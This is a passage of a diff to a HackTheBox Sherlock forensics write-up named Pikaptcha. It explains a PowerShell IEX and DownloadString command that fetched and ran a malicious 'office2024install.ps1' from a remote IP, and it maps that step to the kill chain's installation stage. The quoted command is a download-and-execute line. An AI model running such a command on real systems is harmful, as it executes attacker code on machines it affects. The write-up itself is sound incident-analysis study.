jon-brandy/hackthebox/Categories/Sherlocks/Pikaptcha/README.md

 `-Command` flag is used to specify the powershell command, `IEX` (Invoke Expression) this cmdlet is used to evaluate or runs the expression passed to it. `(New-Object Net.WebClient).DownloadString('http://43.205.115.44/office2024install.ps1')` this part creates a new web client object to download the script from the remote server and this script content is passed to IEX which runs it in the current powershell session.

 In short, this powershell command is used to download a malicious powersell script file --> `office2024install.ps1`.

+11. Anyway if we correlate this with cyber kill chain stages, this stage is at the **installation** stage --> stage where the attacker tried to gain persistence.
-11. Great!
+12. Great!
 Simple as that now we identified the full command that was run to download and execute the stager.

 > 2ND QUESTION --> ANS: